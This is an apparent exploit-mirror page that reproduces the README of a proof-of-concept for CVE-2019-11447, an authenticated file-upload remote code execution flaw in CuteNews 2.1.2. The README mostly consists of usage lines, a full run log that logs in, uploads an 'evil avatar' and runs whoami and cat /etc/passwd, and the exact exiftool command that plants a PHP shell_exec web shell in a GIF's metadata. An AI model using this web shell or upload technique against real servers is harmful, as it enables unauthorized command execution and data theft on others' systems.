Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-11447 PoC — 编号重复

Source
https://github.com/dinesh876/CVE-2019-11447-POC
Associated Vulnerability
Title:编号重复 (CVE-2019-11447)
Description:CutePHP CuteNews是一套新闻管理系统。该系统具有搜索、文件上传管理、访问控制、备份和恢复等功能。 “废弃”请勿使用此编号。原因:此编号与CNNVD-201110-126编号重复,所有使用CNNVD编号的用户请参考CNNVD-201110-126编号。为防止意外使用,此编号中的所有信息已删除。
Description
CuteNews 2.1.2 - CVE-2019-11447 Proof-Of-Concept
Readme
# CVE-2019-11447-POC
CuteNews 2.1.2 Exploit - CVE-2019-11447 Proof-Of-Concept

POC by CRFSlick, discovered by AkkuS <Özkan Mustafa Akkuş>

The official CVE explanation is a bit confusing, so here's my take on it. If you are authenticated with CuteNews, not necessarily as an admin, then you can change certain things about your profile. One of those things that you can change is your profile image. If you upload a profile image and change the extension of your image to '.php', then you can easily visit the image under \<base uri\>/uploads and opening it will cause the webserver to load the file as PHP. Knowing this, you can embed valid PHP code inside of the metadata of your profile image to execute arbitrary code.

## Usage
```bash
Usage:
	CVE-2019-1144.py <username> <password> <base uri / login page>
Example:
	CVE-2019-1144.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
```

```bash
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ python3 CVE-2019-11447.py admin p4ssw0rd http://192.168.1.19/CuteNews/index.php
-.-. --- --- .-..    .... ....- -..- --- .-.    -... .- -. -. . .-.
[*] Detected version 'CuteNews 2.1.2'
[*] Grabbing session cookie
[*] Logging in as admin:p4ssw0rd
[+] Login Success!
[*] Grabbing __signature_key and __signature_dsi needed for pofile update request
[+] __signature_key: 45ad06a9fc89f75e7ef046a11079c33d-admin
[+] __signature_dsi: 71e41d6500f2dc51d0606f64539f84b1
[*] Uploading evil avatar... Done!
[*] Validating that the file was uploaded... Yup!
[+] http://192.168.1.19/CuteNews/uploads/avatar_admin_5629.php?cmd=<cmd>
[*] Looks like everything went smoothly, lets see if we have RCE!
[*] Keep in mind that this shell is limited, no STDERR

$> whoami
www-data

$> cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
```

## Evil GIF

The evil gif was grabbed from the internet and then modified using exiftool in order to insert the needed PHP
```bash
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool -Comment='<?php echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3RhcnRzaGVyZQ==\n\n\n"'"; echo shell_exec($_GET["'"cmd"'"]); echo "'"\n\ndGhpc3dlYnNoZWxsb3V0cHV0ZW5kc2hlcmU=\n\n"'";?>' sad.gif
```

Exiftool will show the metadata of the image where you will find the placed PHP code inside of the comment
```bash
┌──(slick㉿kali)-[~/CVE-2019-11447-POC]
└─$ exiftool sad.gif 
ExifTool Version Number         : 12.05
File Name                       : sad.gif
...
Comment                         : <?php echo "\n\ndGhpc3dlYnNoZWxsb3V0cHV0c3R...
```

## Sources
+ https://nvd.nist.gov/vuln/detail/CVE-2019-11447
+ http://pentest.com.tr/exploits/CuteNews-2-1-2-Remote-Code-Execution-Metasploit.html



## Disclaimer
This project is intended for educational purposes only and cannot be used for law violation or personal gain.
The author of this project is not responsible for any possible harm caused by the materials.
File Snapshot

 [4.0K]  /data/pocs/f7b1d371b801b344d52d22db5eb2d894787a3ee8
├── [4.7K]  CVE-2019-11447.py
├── [2.9K]  README.md
└── [ 28K]  sad.gif

0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.